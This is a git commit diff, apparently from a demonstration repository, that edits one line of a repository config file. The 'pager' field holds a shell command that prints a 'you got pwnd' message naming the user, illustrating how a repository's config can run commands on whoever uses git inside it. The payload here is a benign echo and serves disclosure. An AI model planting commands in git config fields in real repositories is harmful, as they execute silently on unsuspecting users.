add newline to separate from clone output

development
Thomas Lindner 2023-07-02 15:21:30 +02:00
parent a05ccd04dd
commit 28573a9369
1 changed files with 1 additions and 1 deletions

View File

@ -5,4 +5,4 @@
filemode = true
bare = false
worktree = "."
pager = "echo \"Hi $USER, you got pwnd! (Read https://lwn.net/Articles/892755/)\">&2;"
pager = "echo \"\\nHi $USER, you got pwnd! (Read https://lwn.net/Articles/892755/)\">&2;"